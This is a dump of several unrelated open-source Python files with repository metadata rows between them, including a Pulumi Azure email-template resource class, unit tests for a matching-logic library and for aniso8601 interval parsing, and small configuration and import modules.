        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        ...
    # Typing-only overload: construction from an EmailTemplateArgs object.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: EmailTemplateArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a API Management Email Template.
        ## Import
        API Management Email Templates can be imported using the `resource id`, e.g.
        ```sh
         $ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
        ```
        :param str resource_name: The name of the resource.
        :param EmailTemplateArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above: the helper decides
        # whether an EmailTemplateArgs instance was passed positionally.
        resource_args, opts = _utilities.get_resource_args_opts(EmailTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            # Args-object form: expand its fields into keyword arguments.
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            # Keyword form: pass everything through unchanged.
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       api_management_name: Optional[pulumi.Input[str]] = None,
                       body: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       subject: Optional[pulumi.Input[str]] = None,
                       template_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared constructor body: validates options, checks required inputs and
        # registers the resource with the engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = EmailTemplateArgs.__new__(EmailTemplateArgs)
            # Each input is required unless an existing resource is referenced via opts.urn.
            if api_management_name is None and not opts.urn:
                raise TypeError("Missing required property 'api_management_name'")
            __props__.__dict__["api_management_name"] = api_management_name
            if body is None and not opts.urn:
                raise TypeError("Missing required property 'body'")
            __props__.__dict__["body"] = body
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if subject is None and not opts.urn:
                raise TypeError("Missing required property 'subject'")
            __props__.__dict__["subject"] = subject
            if template_name is None and not opts.urn:
                raise TypeError("Missing required property 'template_name'")
            __props__.__dict__["template_name"] = template_name
            # description and title are not constructor inputs; they start as None
            # (presumably filled in by the provider -- see the output properties below).
            __props__.__dict__["description"] = None
            __props__.__dict__["title"] = None
        super(EmailTemplate, __self__).__init__(
            'azure:apimanagement/emailTemplate:EmailTemplate',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api_management_name: Optional[pulumi.Input[str]] = None,
            body: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            subject: Optional[pulumi.Input[str]] = None,
            template_name: Optional[pulumi.Input[str]] = None,
            title: Optional[pulumi.Input[str]] = None) -> 'EmailTemplate':
        """
        Get an existing EmailTemplate resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
        :param pulumi.Input[str] description: The description of the Email Template.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] subject: The subject of the Email.
        :param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        :param pulumi.Input[str] title: The title of the Email Template.
        """
        # Adopt an existing resource by id; state fields act as lookup hints.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _EmailTemplateState.__new__(_EmailTemplateState)
        __props__.__dict__["api_management_name"] = api_management_name
        __props__.__dict__["body"] = body
        __props__.__dict__["description"] = description
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["subject"] = subject
        __props__.__dict__["template_name"] = template_name
        __props__.__dict__["title"] = title
        return EmailTemplate(resource_name, opts=opts, __props__=__props__)
    # Read-only output properties (pulumi.Output, not pulumi.Input): no setters.
    @property
    @pulumi.getter(name="apiManagementName")
    def api_management_name(self) -> pulumi.Output[str]:
        """
        The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "api_management_name")
    @property
    @pulumi.getter
    def body(self) -> pulumi.Output[str]:
        """
        The body of the Email. Its format has to be a well-formed HTML document.
        """
        return pulumi.get(self, "body")
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[str]:
        """
        The description of the Email Template.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "resource_group_name")
    @property
    @pulumi.getter
    def subject(self) -> pulumi.Output[str]:
        """
        The subject of the Email.
        """
        return pulumi.get(self, "subject")
    @property
    @pulumi.getter(name="templateName")
    def template_name(self) -> pulumi.Output[str]:
        """
        The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
        """
        return pulumi.get(self, "template_name")
    @property
    @pulumi.getter
    def title(self) -> pulumi.Output[str]:
        """
        The title of the Email Template.
        """
        return pulumi.get(self, "title")
| 54.297821
| 678
| 0.697926
| 2,408
| 22,425
| 6.306478
| 0.077243
| 0.058672
| 0.07283
| 0.055051
| 0.874424
| 0.850125
| 0.825365
| 0.807652
| 0.791914
| 0.760767
| 0
| 0.004022
| 0.212709
| 22,425
| 412
| 679
| 54.429612
| 0.856131
| 0.454716
| 0
| 0.568465
| 1
| 0
| 0.109552
| 0.007857
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157676
| false
| 0.004149
| 0.020747
| 0
| 0.273859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7771690ab1807cb9139ad27926f0a236d63c83a7
| 5,778
|
py
|
Python
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 1
|
2020-12-20T05:35:33.000Z
|
2020-12-20T05:35:33.000Z
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 23
|
2021-03-01T00:13:19.000Z
|
2022-02-21T11:21:58.000Z
|
ml/aml/aml_test.py
|
pldi22-paper-2/pldi22-paper-2
|
da4833c9feecff5aab5de8af02816e929e371d62
|
[
"BSD-3-Clause"
] | 3
|
2020-11-19T02:00:24.000Z
|
2021-04-27T17:51:32.000Z
|
from aml import *
def test_free_variables() -> None:
    """free_variables() yields exactly the unbound element/set variables."""
    # Atoms: variables are free in themselves; symbols have no free variables.
    assert EVar("x").free_variables() == {EVar("x")}
    assert SVar("x").free_variables() == {SVar("x")}
    assert Symbol("s").free_variables() == set()
    # Binary connectives/applications union the operands' free variables.
    for connective in (And, Or, App):
        assert connective(EVar("x"), SVar("x")).free_variables() == {EVar("x"), SVar("x")}
        assert connective(EVar("x"), SVar("y")).free_variables() == {EVar("x"), SVar("y")}
    # Negation is transparent to free variables.
    assert Not(And(EVar("x"), SVar("x"))).free_variables() == {EVar("x"), SVar("x")}
    assert Not(And(EVar("x"), SVar("y"))).free_variables() == {EVar("x"), SVar("y")}
    # Element-variable binders remove the bound EVar but not a same-named SVar.
    for quantifier in (Exists, Forall):
        assert quantifier(EVar("x"), SVar("x")).free_variables() == {SVar("x")}
        assert quantifier(EVar("x"), EVar("x")).free_variables() == set()
    # Fixpoint binders remove the bound SVar but not a same-named EVar.
    for fixpoint in (Mu, Nu):
        assert fixpoint(SVar("x"), EVar("x")).free_variables() == {EVar("x")}
        assert fixpoint(SVar("x"), SVar("x")).free_variables() == set()
def test_substitute() -> None:
    """Exercise ``Pattern.substitute(var, replacement)``.

    Free occurrences of ``var`` are replaced by ``replacement``; occurrences
    bound by an enclosing binder are left alone.  Exists/Forall bind element
    variables (EVar) only and Mu/Nu bind set variables (SVar) only, so e.g.
    an SVar under Exists is still free and does get substituted.
    """
    # Exists binds its EVar: substituting the bound EVar is a no-op, while
    # SVars and EVars with a different name are still substituted.
    assert Exists(EVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("x"), EVar("x"))
    assert Exists(EVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("x"), SVar("x"))
    assert Exists(EVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("y"), EVar("v"))
    assert Exists(EVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Exists(EVar("y"), SVar("x"))
    assert Exists(EVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("x"), EVar("x"))
    assert Exists(EVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("x"), EVar("v"))
    assert Exists(EVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("y"), EVar("x"))
    assert Exists(EVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Exists(EVar("y"), EVar("v"))
    # Forall behaves exactly like Exists with respect to binding.
    assert Forall(EVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("x"), EVar("x"))
    assert Forall(EVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("x"), SVar("x"))
    assert Forall(EVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("y"), EVar("v"))
    assert Forall(EVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Forall(EVar("y"), SVar("x"))
    assert Forall(EVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("x"), EVar("x"))
    assert Forall(EVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("x"), EVar("v"))
    assert Forall(EVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("y"), EVar("x"))
    assert Forall(EVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Forall(EVar("y"), EVar("v"))
    # Mu binds its SVar: the bound SVar is never substituted, while EVars are
    # always free under Mu.
    assert Mu(SVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("x"), EVar("v"))
    assert Mu(SVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("x"), SVar("x"))
    assert Mu(SVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("y"), SVar("x"))
    assert Mu(SVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Mu(SVar("y"), EVar("v"))
    assert Mu(SVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("x"), EVar("x"))
    assert Mu(SVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("x"), SVar("x"))
    assert Mu(SVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("y"), EVar("x"))
    assert Mu(SVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Mu(SVar("y"), EVar("v"))
    # Nu behaves exactly like Mu with respect to binding.
    assert Nu(SVar("x"), EVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("x"), EVar("v"))
    assert Nu(SVar("x"), SVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("x"), SVar("x"))
    assert Nu(SVar("y"), SVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("y"), SVar("x"))
    assert Nu(SVar("y"), EVar("x")).substitute(EVar("x"), EVar("v")) == Nu(SVar("y"), EVar("v"))
    assert Nu(SVar("x"), EVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("x"), EVar("x"))
    assert Nu(SVar("x"), SVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("x"), SVar("x"))
    assert Nu(SVar("y"), EVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("y"), EVar("x"))
    assert Nu(SVar("y"), SVar("x")).substitute(SVar("x"), EVar("v")) == Nu(SVar("y"), EVar("v"))
    # Substitution recurses structurally through And/Or/App.  Symbol("c") is a
    # constant, not a variable, so substituting SVar("c") leaves it untouched.
    assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("a"), SVar("x")) \
        == And(Or(SVar("x"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e")))
    assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("b"), SVar("x")) \
        == And(Or(SVar("a"), SVar("x")), App(App(Symbol("c"), SVar("d")), SVar("e")))
    assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("c"), SVar("x")) \
        == And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e")))
    assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("d"), SVar("x")) \
        == And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("x")), SVar("e")))
    assert And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("e"))).substitute(SVar("e"), SVar("x")) \
        == And(Or(SVar("a"), SVar("b")), App(App(Symbol("c"), SVar("d")), SVar("x")))
| 69.614458
| 120
| 0.533576
| 902
| 5,778
| 3.39357
| 0.034368
| 0.14211
| 0.070565
| 0.058804
| 0.968638
| 0.954917
| 0.944463
| 0.886638
| 0.807579
| 0.583469
| 0
| 0
| 0.119072
| 5,778
| 82
| 121
| 70.463415
| 0.601375
| 0
| 0
| 0
| 0
| 0
| 0.053479
| 0
| 0
| 0
| 0
| 0
| 0.875
| 1
| 0.03125
| true
| 0
| 0.015625
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7797b51a1442ab9ecd51671b370f7d51e7fcaa27
| 6,080
|
py
|
Python
|
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
aniso8601/tests/test_interval.py
|
3stack-software/python-aniso8601-relativedelta
|
99a42e5e57fa16879325dc151bd811b478ca31b9
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
import unittest
import datetime
from aniso8601.interval import parse_interval, parse_repeating_interval
class TestIntervalFunctions(unittest.TestCase):
    """Tests for aniso8601's ISO 8601 interval parsing helpers."""
    def test_parse_interval(self):
        """parse_interval returns a 2-tuple of interval endpoints.

        For <duration>/<date> the given date is element 0 and the computed
        (earlier) endpoint is element 1; for <date>/<duration> the given date
        is element 0 and the later endpoint is element 1; for <date>/<date>
        the endpoints come back in the order written.  A duration with a time
        component applied to a plain date yields a datetime (offset from that
        date's midnight).
        """
        # <duration>/<end>: the duration is subtracted from the given end.
        resultinterval = parse_interval('P1M/1981-04-05T01:01:00')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=3, day=6, hour=1, minute=1))
        resultinterval = parse_interval('P1M/1981-04-05')
        self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
        self.assertEqual(resultinterval[1], datetime.date(year=1981, month=3, day=6))
        # A time-valued duration against a bare date produces a datetime.
        resultinterval = parse_interval('PT1H/2014-11-12')
        self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
        self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=11, hour=23))
        resultinterval = parse_interval('PT4H54M6.5S/2014-11-12')
        self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
        self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=11, hour=19, minute=5, second=53, microsecond=500000))
        # <start>/<duration>: the duration is added to the given start.
        resultinterval = parse_interval('1981-04-05T01:01:00/P1M1DT1M')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=5, day=6, hour=1, minute=2))
        resultinterval = parse_interval('1981-04-05/P1M1D')
        self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
        self.assertEqual(resultinterval[1], datetime.date(year=1981, month=5, day=6))
        resultinterval = parse_interval('2014-11-12/PT1H')
        self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
        self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=12, hour=1, minute=0))
        resultinterval = parse_interval('2014-11-12/PT4H54M6.5S')
        self.assertEqual(resultinterval[0], datetime.date(year=2014, month=11, day=12))
        self.assertEqual(resultinterval[1], datetime.datetime(year=2014, month=11, day=12, hour=4, minute=54, second=6, microsecond=500000))
        # <start>/<end>: both endpoints explicit, returned as written (mixed
        # date/datetime allowed, and no ordering is enforced).
        resultinterval = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        resultinterval = parse_interval('1980-03-05T01:01:00/1981-04-05')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.date(year=1981, month=4, day=5))
        resultinterval = parse_interval('1980-03-05/1981-04-05T01:01:00')
        self.assertEqual(resultinterval[0], datetime.date(year=1980, month=3, day=5))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        resultinterval = parse_interval('1980-03-05/1981-04-05')
        self.assertEqual(resultinterval[0], datetime.date(year=1980, month=3, day=5))
        self.assertEqual(resultinterval[1], datetime.date(year=1981, month=4, day=5))
        resultinterval = parse_interval('1981-04-05/1980-03-05')
        self.assertEqual(resultinterval[0], datetime.date(year=1981, month=4, day=5))
        self.assertEqual(resultinterval[1], datetime.date(year=1980, month=3, day=5))
        # Custom interval and date/time delimiters.
        resultinterval = parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00', intervaldelimiter='--')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        resultinterval = parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00', datetimedelimiter=' ')
        self.assertEqual(resultinterval[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(resultinterval[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
    def test_parse_repeating_interval(self):
        """parse_repeating_interval yields each repetition's date/datetime.

        Rn repeats n times; a duration before the date steps backwards in
        time, after it forwards.  A bare 'R' repeats without bound, so it is
        consumed lazily with next() rather than list().
        """
        resultsinterval = None  # (kept local to the original asserts below)
        results = list(parse_repeating_interval('R3/1981-04-05/P1D'))
        self.assertEqual(results[0], datetime.date(year=1981, month=4, day=5))
        self.assertEqual(results[1], datetime.date(year=1981, month=4, day=6))
        self.assertEqual(results[2], datetime.date(year=1981, month=4, day=7))
        # Duration-first form counts backwards from the end instant.
        results = list(parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00'))
        for dateindex in range(0, 11):
            self.assertEqual(results[dateindex], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1) - dateindex * datetime.timedelta(hours=1, minutes=2))
        results = list(parse_repeating_interval('R2--1980-03-05T01:01:00--1981-04-05T01:01:00', intervaldelimiter='--'))
        self.assertEqual(results[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(results[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        results = list(parse_repeating_interval('R2/1980-03-05 01:01:00/1981-04-05 01:01:00', datetimedelimiter=' '))
        self.assertEqual(results[0], datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1))
        self.assertEqual(results[1], datetime.datetime(year=1981, month=4, day=5, hour=1, minute=1))
        # Unbounded repetition: only pull a finite prefix from the generator.
        resultgenerator = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00')
        for dateindex in range(0, 11):
            self.assertEqual(next(resultgenerator), datetime.datetime(year=1980, month=3, day=5, hour=1, minute=1) - dateindex * datetime.timedelta(hours=1, minutes=2))
| 61.414141
| 169
| 0.700329
| 861
| 6,080
| 4.907085
| 0.114983
| 0.138462
| 0.205917
| 0.048284
| 0.865089
| 0.815621
| 0.776331
| 0.760237
| 0.730888
| 0.730888
| 0
| 0.139177
| 0.144408
| 6,080
| 98
| 170
| 62.040816
| 0.67301
| 0.032072
| 0
| 0.402985
| 0
| 0.044776
| 0.092208
| 0.064308
| 0
| 0
| 0
| 0
| 0.58209
| 1
| 0.029851
| false
| 0
| 0.044776
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77a64f6d50d9f7f3592c7085e13586c2d0037414
| 130
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/calculators/calc_radio.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.calculators.calc_radio import CALC_Radio_jumbo
class CALC_Radio_nixi(CALC_Radio_jumbo):
    """Radio calculator for the Nixi part.

    Inherits all calculation behaviour unchanged from the Jumbo
    implementation; no Nixi-specific overrides are defined here.
    """
    pass
| 21.666667
| 77
| 0.846154
| 19
| 130
| 5.421053
| 0.578947
| 0.349515
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 130
| 6
| 78
| 21.666667
| 0.880342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
77f1f4fa1de5fac1dff8a5247f62f9d65a936f6b
| 105
|
py
|
Python
|
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | null | null | null |
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | null | null | null |
gala/potential/setup_package.py
|
segasai/gala
|
8d6f3557894231d975c287a2b8560d09a4789513
|
[
"MIT"
] | 1
|
2018-10-23T23:20:20.000Z
|
2018-10-23T23:20:20.000Z
|
def get_package_data():
    """Return the package-data mapping for ``gala.potential``.

    Maps the package name to the C header files that must ship with it.
    """
    headers = ['src/funcdefs.h', 'potential/src/cpotential.h']
    return {'gala.potential': headers}
| 26.25
| 79
| 0.695238
| 14
| 105
| 5.071429
| 0.785714
| 0.338028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104762
| 105
| 3
| 80
| 35
| 0.755319
| 0
| 0
| 0
| 0
| 0
| 0.519231
| 0.25
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
77fa19ec4c1f8048df85d81b2e2cbc1f7f72516b
| 109
|
py
|
Python
|
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
ipython/startup/import_shutil.py
|
dycw/dotfiles2
|
9e23c4989e9813080da3658a8f98dbb1e03776f2
|
[
"MIT"
] | null | null | null |
import shutil # noqa: F401
from shutil import copyfile # noqa: F401
from shutil import which # noqa: F401
| 27.25
| 41
| 0.743119
| 16
| 109
| 5.0625
| 0.4375
| 0.296296
| 0.296296
| 0.444444
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 0.201835
| 109
| 3
| 42
| 36.333333
| 0.827586
| 0.293578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7ad7c97c6ce0cade9c17c1f86de0089776efc95b
| 2,784
|
py
|
Python
|
getKey.py
|
UcanYusuf/ArrowGui
|
5c55cb1bd7c8e9dedf45d620fcd01d2f3ed0109e
|
[
"MIT"
] | null | null | null |
getKey.py
|
UcanYusuf/ArrowGui
|
